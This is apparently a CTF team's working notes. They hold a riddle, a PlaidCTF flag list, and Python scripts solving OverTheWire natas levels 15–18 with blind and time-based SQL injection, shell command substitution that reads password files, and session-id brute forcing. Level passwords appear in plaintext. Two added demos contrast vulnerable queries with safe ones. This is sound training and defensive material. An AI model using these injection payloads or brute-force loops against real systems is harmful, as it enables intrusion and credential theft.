irc channel: hackint.org #ccchh-ctf

Current challenge: "Drink me!" - http://3564020356.org/showresource.php3?sid=bdbd99fdbf40e237605c451b1b76811b&resid=4

10 11 09 12 08 13 14 05 15 07 16 02 04 03 17 06 01

var[10] + var[11] + var[9] + var[12] + var[8] + var[13] + var[14] + var[5] + var[15] + var[7] + var[16] + var[2] + var[4] + var[3] + var[17] + var[6] + var[1]

var[17] + var[12] + var[14] + var[13] + var[8] + var[16] + var[10] + var[5] + var[3] + var[1] + var[2] + var[4] + var[6] + var[7] + var[9] + var[11] + var[15]

pitssasto cS lLdi coSt lsLsdistiap iSl td stpisasocL

Riddle 02: Alice in Wonderland.

Have you ever read "Alice in Wonderland", my friend? Well, you should. This is not completely related to this riddle, but I'm sure you would learn something from it: at least, it contains many hints about adventures. Which adventures am I speaking about? Text adventures, the best ones. At least, in my opinion: I swear, _THOSE_ were riddles. For instance, a classic which you can find in textual adventures is the trick of the bottle/the food: as in "Alice in Wonderland", you can grow bigger or become smaller eating or drinking something and this can help you, for instance, if you want to enter a door which is too small for you or if you want to reach a place which is too high! If you are interested in this kind of games I'll give you some hints. Search, for instance, with the keywords "text adventures" or, if you are interested in other kinds of "old" software, just try with "abandonwares" or "abandonwarez"; also, searching for "Infocom" and "Scott Adam" would not be a bad choice. Why am I speaking about all this stuff? Well, as you should know (but probably you do not ;) preparing a riddle is not easy. It requires time and effort, and sometimes it even requires more words than the ones you are used to writing.
All starts with a simple idea: you want to take your readers somewhere, to a place you've decided yet, to a conclusion that you think is obvious because you start from that and then "backtrack" from it to the first question (or questions, sometimes). But often this kind of backtracking is not easy at all, my friend. I'm afraid that this time the riddle will be far too easy. At least, easier than I'd like (anyway I'll soon discover it, just by giving a look at the users' db): don't worry anyway, next one will be harder. What do you have to do to solve this riddle? Trivial, you just have to find another password I have hidden somewhere in this page. I found this riddle easy because in my opinion there are many, many ways you can work to find the answer. So, this time I'll try to avoid giving you hints: but I'm sure you will be able to solve it anyway, my friend. The only things that you have here are this text, the picture you can see above it (at least I hope you can see it, I think it could be helpful) and a detail of this picture, which is contained in a zip file you can download just by clicking on the picture itself: study them, and the solution will be as easy as just connecting the clues you have found.
curl 'http://2016.zeromutarts.de:81/admin.php?include=admin_home' -H 'Cookie: PHPSESSID=unm458jbeprvsbhq13jrrig2v7' -H 'Origin: http://2016.zeromutarts.de:81' -H 'Content-Type: application/x-www-form-urlencoded' --data 'user=sadfdsf&password=sdfdf' -v

Web-Challenge "Natas" (passwords live in /etc/natas_webpass/natasXY)

" or 1 or "1" = "1

http://overthewire.org/wargames/natas/natas16.html <------- continue here

15:

import requests

url = "http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/"

# Step 1 (run once): find which characters occur in the password at all.
# The "user exists" message is the boolean oracle for the injected LIKE.
# alphabet = []
# for a in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789':
#     r = requests.post(url, data={'username': '''natas16" and password like binary '%%%s%%' and "1" = "1''' % a})
#     if 'user exists' in r.text:
#         print(a)
#         alphabet += a
# print(alphabet)
# print(len(alphabet))

# Step 2: extend the known prefix one character at a time, trying only the
# characters found in step 1; stop when no candidate extends the prefix.
s = requests.Session()
pw = ''
run = True
while run:
    run = False
    for a in ['a', 'c', 'e', 'h', 'i', 'j', 'm', 'n', 'p', 'q', 't', 'w', 'B', 'E', 'H', 'I', 'N', 'O', 'R', 'W', '0', '3', '5', '6', '9']:
        print(pw + a)
        r = s.post(url, data={'username': '''natas16" and password like binary '%s%%' and "1" = "1''' % (pw + a)})
        if 'user exists' in r.text:
            pw += a
            print("!", pw)
            run = True
            break

16:

import requests


def get_alphabet():
    # The needle is expanded by a shell: if the inner grep matches, its output
    # is prepended to "Africans" and the outer grep finds nothing, so a missing
    # "Africans" in the response means the character occurs in the password.
    alphabet = []
    for a in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789':
        r = requests.post("http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh@natas16.natas.labs.overthewire.org/",
                          data={'needle': '$(grep %s /etc/natas_webpass/natas17)Africans' % a})
        if 'Africans' not in r.text:
            print("Found %s" % a)
            alphabet += a

    print(alphabet)
    print(len(alphabet))

Result:

['b', 'c', 'd', 'g', 'h', 'k', 'm', 'n', 'q', 'r', 's', 'w', 'A', 'G', 'H', 'N', 'P', 'Q', 'S', 'W', '0', '3', '5', '7', '8', '9']
26

$(grep bn5rd9S7GmAdgQNdkhPkq9cw /etc/natas_webpass/natas17)Africans

On 17:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests

url = "http://natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw@natas17.natas.labs.overthewire.org/"


def get_alphabet():
    # Time-based oracle: the injected sleep(2) only runs when the LIKE matches,
    # so a slow response means the character occurs in the password.
    alphabet = []
    for a in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789':
        r = requests.post(url, data={'username': '''natas18" and password like binary '%%%s%%' and sleep(2) and "1" = "1''' % a})
        if r.elapsed.seconds >= 2:
            print("Found %s" % a)
            alphabet += a

    print(alphabet)
    print(len(alphabet))


def brute_force():
    # Extend the known prefix one character at a time, using only the
    # characters found by get_alphabet(); stop when no candidate matches.
    s = requests.Session()

    pw = ''
    run = True
    while run:
        run = False
        for a in ['d', 'g', 'h', 'j', 'l', 'm', 'p', 'q', 's', 'v', 'w', 'x', 'y', 'C', 'D', 'F', 'I', 'K', 'O', 'P', 'R', '0', '4', '7']:
            print(pw + a)
            r = s.post(url, data={'username': '''natas18" and password like binary '%s%%' and sleep(2) and "1" = "1''' % (pw + a)})
            if r.elapsed.seconds >= 2:
                run = True
                pw += a
                print("! %s" % pw)
                break


# get_alphabet()
brute_force()

18:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests

url = "http://natas18:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP@natas18.natas.labs.overthewire.org/"

s = requests.Session()
# Session ids are small integers here, so every id in the range is tried
# until the page reports an admin session.
for i in range(640):
    r = s.get(url, cookies={
        'PHPSESSID': '%s' % i
    })

    print("testing %i" % i)
    if b"You are an admin" in r.content:
        print("Id: %s\n%s" % (i, r.content))

a - 3431312d61
a - 3530392d61
a - 322d61
a - 3539392d61
b - 3338382d62
b - 39362d62
b - 32372d62

PCTF2017 https://play.plaidctf.com/

Keys:
1. sanity check: PCTF{poop}
2. logarithms are hard: PCTF{}
3. Multicast: PCTF{}
4. no_mo_flo: PCTF{}
5. zipper: PCTF{}
6. gameboy: PCTF{}
7. scriptabble: PCTF{}
8. BB-8: PCTF{}
9. Echo: PCTF{}
10. Common: PCTF{}
11. bigpicture: PCTF{}
12. zamboni: PCTF{}
13. terebeep: PCTF{}
14. Chakrazy: PCTF{}
15. Pykemon: PCTF{N0t_4_sh1ny_M4g1k4rp}
16. definitely maybe: PCTF{}
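As an added example (not code from the pad or from the wargame), the prefix-extension loop that the natas15 and natas17 scripts above drive over HTTP, run offline against a constructed SQLite table so the string-built query can be compared with a parameterised one. SQLite has no `like binary`, so the demo uses single-quoted literals and `PRAGMA case_sensitive_like` in place of the MySQL syntax; the table, the secret and every function name are constructed.

```python
import sqlite3

ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'


def make_db():
    # Constructed in-memory stand-in for the login backend; not the wargame's schema.
    con = sqlite3.connect(":memory:")
    con.execute("PRAGMA case_sensitive_like = 1")   # mimic MySQL's LIKE BINARY
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('natas16', 'Xk9bQ2m')")  # constructed secret
    return con


def user_exists_vulnerable(con, username):
    # The username is pasted into the statement, so a quote in it closes the
    # literal and everything after it is parsed as SQL (the pad's injection point).
    query = "SELECT * FROM users WHERE username='%s'" % username
    return len(con.execute(query).fetchall()) > 0


def user_exists_safe(con, username):
    # Bound parameter: the whole string is compared as one value and never parsed.
    query = "SELECT * FROM users WHERE username=?"
    return len(con.execute(query, (username,)).fetchall()) > 0


def extract_password(oracle, max_len=32):
    # Same prefix-extension loop as the pad's scripts, but the oracle is a local
    # True/False function instead of the "user exists" text of an HTTP response.
    pw = ''
    for _ in range(max_len):
        for a in ALPHABET:
            payload = "natas16' and password like '%s%%' and '1' = '1" % (pw + a)
            if oracle(payload):
                pw += a
                break
        else:
            break   # no candidate extends the prefix: finished, or nothing leaks
    return pw


if __name__ == "__main__":
    con = make_db()
    print(extract_password(lambda u: user_exists_vulnerable(con, u)))  # recovers the secret
    print(repr(extract_password(lambda u: user_exists_safe(con, u))))  # '' : no leak
```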
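An added example (not from the pad or the wargame) of the `$(grep ...)Africans` oracle used against natas16 above, reproduced offline with a constructed word list and secret file, beside the argv-style call that leaves nothing for a shell to expand. File names, file contents and function names are constructed; it assumes `grep` and `/bin/sh` are available.

```python
import os
import subprocess
import tempfile


def make_files():
    # Constructed stand-ins for the word list being searched and for the
    # protected password file; neither is the wargame's real content.
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "dictionary.txt"), "w") as f:
        f.write("African\nAfricans\nZebra\n")
    with open(os.path.join(d, "secret.txt"), "w") as f:
        f.write("k7Qs\n")  # constructed secret
    return d


def search_vulnerable(d, needle):
    # The needle is spliced into a shell command line, so the shell expands
    # $(...) inside the double quotes before grep ever sees the pattern.
    cmd = 'grep -i "%s" dictionary.txt' % needle
    r = subprocess.run(cmd, shell=True, cwd=d, capture_output=True, text=True)
    return r.stdout


def search_safe(d, needle):
    # argv form: no shell is involved, so the needle is one literal grep
    # pattern; "--" keeps a needle starting with "-" from being read as an option.
    argv = ["grep", "-i", "--", needle, "dictionary.txt"]
    r = subprocess.run(argv, cwd=d, capture_output=True, text=True)
    return r.stdout


def char_in_secret(search, d, c):
    # The pad's oracle: if the inner grep matches, its output is prepended to
    # "Africans" and the outer grep finds nothing; otherwise "Africans" comes back.
    out = search(d, "$(grep %s secret.txt)Africans" % c)
    return "Africans" not in out


if __name__ == "__main__":
    d = make_files()
    print(char_in_secret(search_vulnerable, d, "k"))   # True: 'k' is in the secret
    print(char_in_secret(search_vulnerable, d, "z"))   # False: 'z' is not
    print(repr(search_safe(d, "$(grep k secret.txt)Africans")))  # '' whatever c is: no oracle
```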